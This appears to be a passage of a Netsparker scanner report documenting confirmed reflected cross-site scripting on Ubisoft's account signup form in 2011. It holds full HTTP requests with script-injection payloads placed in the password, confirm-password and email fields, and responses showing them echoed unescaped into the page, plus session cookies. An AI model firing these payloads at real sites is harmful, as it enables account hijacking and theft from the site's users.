<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST '"--></style></script><script>alert(0x0005AC)</script>
confirmpassword POST 3
email POST netsparker@example.com
birthdate POST ------
country POST us
ubi_promo POST ubi_promo
shareinfo POST shareinfo
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 358
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005AC)%3c%2fscript%3e&confirmpassword=3&email=netsparker%40example.com&birthdate=------&country=us&ubi_promo=ubi_promo&shareinfo=shareinfo&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:30:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x0005AC)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST 3
confirmpassword POST '"--></style></script><script>alert(0x0005B0)</script>
email POST netsparker@example.com
birthdate POST ------
country POST us
ubi_promo POST ubi_promo
shareinfo POST shareinfo
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 358
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password=3&confirmpassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005B0)%3c%2fscript%3e&email=netsparker%40example.com&birthdate=------&country=us&ubi_promo=ubi_promo&shareinfo=shareinfo&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x0005B0)</script>" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST 3
confirmpassword POST 3
email POST '"--></style></script><script>alert(0x0005B3)</script>
birthdate POST ------
country POST us
ubi_promo POST ubi_promo
shareinfo POST shareinfo
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=wd52t445wlp1eo45uu2igi45; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 335
Accept-Encoding: gzip, deflate

